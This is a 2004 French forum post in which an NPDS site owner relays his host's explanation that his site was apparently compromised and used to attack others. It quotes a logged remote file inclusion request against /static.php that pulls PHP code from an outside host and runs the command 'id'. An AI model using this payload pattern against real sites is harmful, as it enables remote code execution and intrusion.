Index du Forum » » Sécurité

Auteur

[Résolu] - NPDS hacké !
Anonyme
19853  

  Posté : 21-02-2004 23:26

Oufti ... voici ce que me répond mon hébergeur ...


Bonjour,

,- - [ Le samedi 21 février 2004 vers 15:44 tanatloc écrivait: ] - -
|
> Que voulez-vous dire ?
> Votre serveur s'est fait hacké à cause de certains CMOD 777 placés sur mon
> site ???
|
`- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Il ne s'agit pas pour nous d'un hacking de notre serveur, seul votre site est concerné.

Nous ne pouvons affirmer que l'usage qui a été fait de votre site était un hacking ou une fonction volontaire, mais il est probable à 99% que ce soit un hacking...

Dans le cas du hacking (vous seul savez si l'usage qui a été fait de votre site d'attaquer des tiers est l'usage normal que vous souhaitez pour votre site ou non), cela signifie que certains de vos scripts/pages contiennent des trous de sécurité permettant à des tiers d'en faire un usage différent de ce que vous souhaitez.

Le cas concret mentionné dans le log précité concerne la page "/static.php" de votre site, qui a été appelée de la façon suivante :

/static.php?op=http://hack0.tripod.com.br/cse.gif?&cmd=id

Si vous visitez http://hack0.tripod.com.br/cse.gif vous constaterez qu'il s'agit de code php, qui a probablement été placé en !include! par votre script et donc exécuté.

Bien à vous...




Heeeeelp que puis-je faire ???



Cet article provient de NPDS

http://www.npds.org/viewtopic.php?topic=10213&forum=12